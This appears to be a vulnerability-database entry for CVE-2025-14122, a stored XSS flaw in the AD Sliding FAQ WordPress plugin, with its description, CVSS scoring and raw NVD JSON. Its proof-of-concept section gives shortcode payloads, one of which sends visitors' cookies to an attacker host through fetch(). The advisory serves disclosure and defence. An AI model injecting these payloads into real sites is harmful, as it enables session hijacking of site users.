Security Vulnerability Report
中文
CVE-2025-14122 CVSS 6.4 MEDIUM

CVE-2025-14122

Published: 2026-01-07 12:16:53
Last Modified: 2026-04-15 00:35:42

Description

The AD Sliding FAQ plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'sliding_faq' shortcode in all versions up to, and including, 2.4 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.

CVSS Details

CVSS Score
6.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

AD Sliding FAQ WordPress插件 <= 2.4

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- Basic PoC for CVE-2025-14122 Stored XSS in AD Sliding FAQ --> <!-- Attackers with Contributor role can inject malicious JavaScript via shortcode attributes --> <!-- Malicious shortcode example --> [sliding_faq question='<script>alert(document.cookie)</script>' answer='XSS'] <!-- Alternative payload with event handler --> [sliding_faq question='" onmouseover="alert(document.domain)" xlink="' answer='FAQ Content'] <!-- More sophisticated payload for cookie stealing --> [sliding_faq question='<img src=x onerror=fetch("https://attacker.com/steal?c="+document.cookie)>' answer='Details']

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-14122", "sourceIdentifier": "[email protected]", "published": "2026-01-07T12:16:53.163", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The AD Sliding FAQ plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'sliding_faq' shortcode in all versions up to, and including, 2.4 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page."}, {"lang": "es", "value": "El plugin AD Sliding FAQ para WordPress es vulnerable a cross-site scripting almacenado a través del shortcode 'sliding_faq' en todas las versiones hasta la 2.4, inclusive, debido a una sanitización de entrada y escape de salida insuficientes en los atributos proporcionados por el usuario. Esto hace posible que atacantes autenticados, con acceso de nivel de colaborador y superior, inyecten scripts web arbitrarios en páginas que se ejecutarán cada vez que un usuario acceda a una página inyectada."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N", "baseScore": 6.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.1, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/ad-sliding-faq/tags/2.4/any-sliding-faq.php#L205", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/ad-sliding-faq/trunk/any-sliding-faq.php#L205", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/d6c277f4-28e0-4159-a524-6576d72d2059?source=cve", "source": "[email protected]"}]}}